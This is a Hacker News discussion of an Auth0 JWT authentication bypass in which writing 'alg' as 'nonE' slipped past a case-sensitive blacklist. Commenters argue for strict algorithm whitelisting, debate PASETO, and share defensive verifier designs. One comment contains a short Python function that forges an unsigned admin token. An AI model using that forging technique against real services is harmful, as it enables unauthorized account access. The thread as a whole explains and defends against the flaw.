top | item 22890604

Auth0 JWT Auth Bypass: Case-Sensitive Blacklisting Is Harmful

195 points | CiPHPerCoder | 6 years ago | insomniasec.com | reply

92 comments

[+] CiPHPerCoder|6 years ago|reply
Tired: {"alg":"none"}

Wired: {"alg":"nonE"}

The JOSE standards (including JWT) are a gift that keeps on giving to attackers.

I designed an alternative format in 2018 called PASETO, which doesn't contain the JOSE foot-guns. (I'm pushing for an IETF RFC this year.)

https://paseto.io

EDIT: Also, this affected their Authentication API rather than their JWT library.

If you use their JWT library, well, it certainly allows this kind of horrendous misuse... but it is not, per se, vulnerable.
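The Tired/Wired joke compresses the whole bug. A minimal Python sketch of how such a token is forged (claims and header values are illustrative; this is the generic trick, not Auth0's actual API):

```python
import base64
import json

def b64url(data: bytes) -> str:
    # JWT segments use unpadded base64url encoding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_unsigned_jwt(claims: dict) -> str:
    # "nonE" slips past a case-sensitive blacklist of the string "none",
    # while a case-insensitive verifier still treats the token as unsigned.
    header = b64url(json.dumps({"alg": "nonE", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    return f"{header}.{payload}."   # empty signature segment

token = forge_unsigned_jwt({"sub": "admin"})
```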

[+] speedgoose|6 years ago|reply
Before starting a new project some time ago, I read up on the criticisms of JOSE (JWE) and on the alternative, PASETO. I decided to use JOSE carefully instead of PASETO because it had an IETF RFC. I think it would be great for PASETO to get an RFC as well. The second point that made me choose JOSE was that PASETO was a bit too mean towards JOSE, and I didn't want drama in my technology choices.

But good work! With an RFC, PASETO will be my choice for my next projects.

[+] Nursie|6 years ago|reply
We use it, but restrict the sig alg to a couple of known-good values, so I'm hoping this particular vulnerability is not present in our system.

We had an infosec guy excitedly tell us that PASETO was the future and we needed to change to it right now. It looked good, and seemed a way to avoid some of the possible JWT issues, in the same way a TLS implementation that only allows strong ciphers might.

But we have to integrate with so many third party pieces that require JWT it wasn't an option.

[+] different_sort|6 years ago|reply
Why create a new standard rather than push for reform of the current one?

Are they just closely protected by greybeards who won't listen to reason?

Question comes from a true place of ignorance/curiosity, I definitely understand the need to have unambiguous, easy to implement security tokens without the foot-guns.

[+] grinich|6 years ago|reply
I think we're going to use PASETO for some stuff at WorkOS. Thanks for building it. :)
[+] kyrra|6 years ago|reply
(googler, opinions are my own)

For server-to-server, I continue to prefer PGP to provide my encryption. While Google Payments[0] supports PGP and JWE for encrypting payloads, PGP is well tested and most of the bugs have been worked out. JWS/JWE continues to have implementation bugs (likely due to being too flexible).

[0] https://developers.google.com/standard-payments/reference/be...

[+] dwaite|6 years ago|reply
> I'm pushing for an IETF RFC this year.

Are you planning an informational document, or going through the IETF standardization process?

Also, the last published draft is two years old this week. Have there been changes since then to the spec? Are implementations generally interoperable?

[+] OatMilkLatte|6 years ago|reply
I'm going to use PASETO for a personal project I'm working on. If the COVID lockdown ever ends and I have time to work on it. Thanks for building it!
[+] bflesch|6 years ago|reply
Paseto is a great project, thank you very much for your contribution!
[+] ucarion|6 years ago|reply
What IETF WG are you working through?
[+] thinkshiv|6 years ago|reply
Hi all - Shiv from Auth0. I am the CPO and wanted to share some additional context here. On July 31st 2019, at 5:11 am, we received an email from Insomnia reporting a service vulnerability. By 11:00 pm the same day, we had fixed the issue in production. We analyzed the logs and validated that no one exploited the vulnerability. More details from our CSO here: https://auth0.com/blog/insomnia-security-disclosure/?utm_sou.... Thanks to Insomnia for reporting the vulnerability and their partnership in coordinated disclosure. We appreciate the continued feedback from the security community-at-large to ensure we are providing the most secure platform for our global customers.
[+] treve|6 years ago|reply
Why did your implementation have a case-sensitive check for a fixed list of algorithms, and why are you blacklisting vs. whitelisting acceptable algorithms? 'Old, stable' codebase or not... this is production code for a security product and seems like something that would be picked up during an audit.
[+] Arnout|6 years ago|reply
I've encountered issues like this in various systems using JWT at this point. The real problem is that developers blacklist the algorithms they don't want. Instead, the verification code should explicitly whitelist which algorithms you support.

More specifically, you can't rely on the 'alg' parameter with any level of authority before successful signature verification: after all, the header is protected by the very signature whose algorithm it declares. So even with a whitelist, there is the potential for downgrade attacks.

In other words, don't even use a whitelist, use a single specific expected algorithm.

[+] hinkley|6 years ago|reply
I have a coworker who does shit like this all the time.

The list of supported options is not only knowable, but changes very slowly. Which means it's almost certainly known at commit time. Just enumerate them. By hand. Oh no, you might have to type in some text that exists somewhere else! Quelle horreur!

The list of unsupported options is unknowable. The list of string or path interpolation bugs is knowable, but isn't known by the sort of person who thinks a whitelist is a bad idea. Build a lookup table and stop trying to be clever.
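The hand-enumerated lookup table described above might look like this (the algorithm set is illustrative):

```python
# The full set of algorithms this service accepts, enumerated by hand
# and known at commit time. Membership is byte-exact: "nonE", "None",
# and anything else unanticipated simply isn't in the table.
ALLOWED_ALGS = frozenset({"RS256", "ES256"})

def check_alg(alg: str) -> None:
    if alg not in ALLOWED_ALGS:
        raise ValueError(f"unsupported alg: {alg!r}")
```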

[+] deathanatos|6 years ago|reply

  fn verify_jwt(
    // The input from the network/user; the JWT we will be verifying
    untrusted_jwt: String,
    // *The* way in which we expect JWTs to be issued / we will be verifying against:
    verifier: Verifier,
  ) -> ... {

    // Basic sanity checks & decoding.
    let untrusted_jwt: Jwt = ...;

    if !verifier.acceptable_alg(untrusted_jwt.alg) {
      bail;
    }
    verifier.verify(untrusted_jwt)
  }
Where `verifier` is something like `JwtRsa` or `JwtEd25519`, or `JwtHmac`. The verifier should know what few, limited algorithms to look for, and it should reject anything and everything that's not under its domain area. There's no blacklist, no guesswork. (I don't even think I'd have `acceptable_alg`; just let `verify` do that work; it has to look at that field anyways to set up, e.g., the hasher.)

I'm largely omitting¹ JWE, so perhaps there's some hidden dragon in there, or perhaps we just handle those completely separately. But for JWS, am I missing something? Unless you pass `NoneVerifier`, in which case you're explicitly opting in to alg: none and its goriness.

Sadly, I don't think any of the top three Rust libraries do this.

¹I'm also omitting that RSA has many attached hash algorithms in JWS; one can imagine that JwtRsa might let you configure what hashers it will/will not use. As it is, some libraries take sort of this form, but split the key material off from the algorithm … letting you pass craziness like an RSA key material and HMAC-SHA256, which makes no sense. That is, what hash algorithms (if any) are possible is a function of the type of key material coming in.

²I'm also omitting verification of the claims, which I think a library should generally handle.

[+] karatestomp|6 years ago|reply
Is there some good reason to prefer a blacklist in this case, that I'm not thinking of, that might change my reaction to this from "uh, maybe I need to entirely re-think my assumption that Auth0 is any better at this whole securing-users thing than I am"? My immediate and ongoing reaction to the headline was and is, "wait, a blacklist? WTF!"
[+] applecrazy|6 years ago|reply
> Instead, the verification code should explicitly whitelist which algorithms you support.

What libraries are you using? I just looked through the auth code for a project I'm working on (which uses `jsonwebtoken`) and it has an option to whitelist algorithms in the `jwt.verify` method.

Edit: removed repeated info

[+] xianb|6 years ago|reply
It's fascinating that Auth0 actually had a blog post about finding and fixing a handful of JWT vulnerabilities years ago (one of them is more advanced to exploit than this one). Just another example of why you always have to be vigilant, and why properly implementing encryption/security is hard.

https://auth0.com/blog/critical-vulnerabilities-in-json-web-...

[+] twic|6 years ago|reply
At some point, that alg parameter gets resolved to an algorithm - an object or enum constant or something. This bug implies that the filtering was done on the string value of the parameter, and not the resolved value. That seems like a schoolboy error.
[+] user5994461|6 years ago|reply
It's much worse than that. There are maybe five options for the algorithm value: none, RS256, HS256, etc...

The vulnerability implies that they don't verify the value against that very limited list of possible values, which is incredibly stupid.

[+] rvz|6 years ago|reply
The gist of this Auth0 authentication API bypass is detailed as follows:

> The Authentication API prevented the use of alg: none with a case sensitive filter. This means that simply capitalising any letter e.g. alg: nonE, allowed tokens to be forged.

I really don't understand why you'd have a case-sensitive filter for alg:'none'. The better question is why the standard supports 'alg: none' in the first place. As I previously commented, the 'alg: none' option should never be used; it is still the biggest footgun in the JOSE specification. Even giving the user a choice of ciphers is a recipe for disaster. JWT remains a cryptographically weak standard, and its use is discouraged by many cryptographers.

PASETO [0] or Branca [1] are cryptographically stronger alternatives to use over JWT here.

[0] https://paseto.io

[1] https://branca.io

[+] applecrazy|6 years ago|reply
> the option to have 'alg: none' should never be used

I doubt anyone uses this deliberately (edit: except maybe for internal server-to-server communications?). I agree that having it as an option is a footgun. Still, I think this is a non-issue on the client/backend; most libraries explicitly make you whitelist token-signing algorithms and will throw errors if the token isn't signed with the right algorithm.

> Even giving the user a choice of ciphers to use is a recipe for disaster.

How so? I'm still learning this stuff, so I'm genuinely curious.

[+] wereHamster|6 years ago|reply
> The question is that why use and support 'alg:none' in the standard in the first place?

FTFA:

> The JWT standard supports insecure JWT algorithms for scenarios where encryption and a signature are not suitable, such as trusted server-to-server communication. In these scenarios, the none algorithm is specified in the JWT header. The none alg type should never be used for untrusted user-supplied tokens.

[+] user5994461|6 years ago|reply
Most JWT libraries require you to hardcode the expected algorithm when verifying a token, so if your applications are verifying the token provided by Auth0 with a JWT library, they're most likely not vulnerable to this mistake.
[+] userbinator|6 years ago|reply
I think what's more harmful is the fact that something is case-insensitive.

Case insensitivity may have some benefits for human-facing stuff, but otherwise the byte-exact comparison you get with case-sensitive semantics is superior.
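The mismatch being described, in a couple of lines of Python: a case-sensitive blacklist check misses trivially altered input that a case-insensitive consumer still accepts.

```python
# A case-sensitive blacklist misses a trivially altered header value...
blacklist = {"none"}
assert "nonE" not in blacklist   # the forged value sails past the filter

# ...while a case-insensitive consumer downstream still maps it to "none".
assert "nonE".casefold() == "none"
```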

[+] joepie91_|6 years ago|reply
There are actually three lessons to be drawn from this incident:

1. Don't use JWT, it's too easy to mess up.

2. If you're trying to fence off some sort of format or API, whitelist things, don't blacklist them.

3. This narrative that "you should use a third-party authentication provider because they're security experts and are much less likely to get it wrong"... well... I think you can see where I'm going with this.

[+] gjvnq|6 years ago|reply
What if someone used the correct case but weird Unicode characters? I mean, if "none" = "nonE", is "none" equal to a lookalike "none" built from different code points?
[+] user5994461|6 years ago|reply
Good catch. JWT is Unicode out of the box, which is really important for supporting non-English user names and the like.

If Auth0 is doing any sort of normalization, they will definitely be vulnerable to all the Unicode normalization bugs. That would be a great follow-up vulnerability.
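To illustrate, here is what Unicode normalization can do to a lookalike string (U+FF45 is FULLWIDTH LATIN SMALL LETTER E; a sketch of the general hazard, not a claim about what Auth0 does):

```python
import unicodedata

s = "non\uFF45"   # renders like "none" but is not byte-equal to it
assert s != "none"

# NFKC compatibility normalization collapses the fullwidth "e" to ASCII,
# so a verifier that normalizes before comparing would see "none" again.
assert unicodedata.normalize("NFKC", s) == "none"
```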

[+] theamk|6 years ago|reply
The answer to that is we should not be using _any_ case-insensitive strings in protocols.

They are fine for human-visible names, but field names and internal enum values should use byte-by-byte comparison. It just makes entire class of vulnerabilities go away.

[+] NoInputSignal|6 years ago|reply
I think this points out that the semantics of trusting the header (which is still a part of the message) at all is flawed and leads to implementations getting it wrong and leaving gaps for attackers to exploit.
[+] tinus_hn|6 years ago|reply
Blacklisting while you should have been whitelisting is harmful. Choose what you allow instead of trying to list what you don’t.
[+] rgj|6 years ago|reply
Without reading the article: any kind of blacklisting is considered harmful in security.
[+] eximius|6 years ago|reply
Always normalize your input?
[+] JdeBP|6 years ago|reply
Try:

Don't encode your machine-to-machine protocol as human-readable strings, leading to things like declaring machine-readable identifiers to be case-insensitive when only the humans need this, not the machines.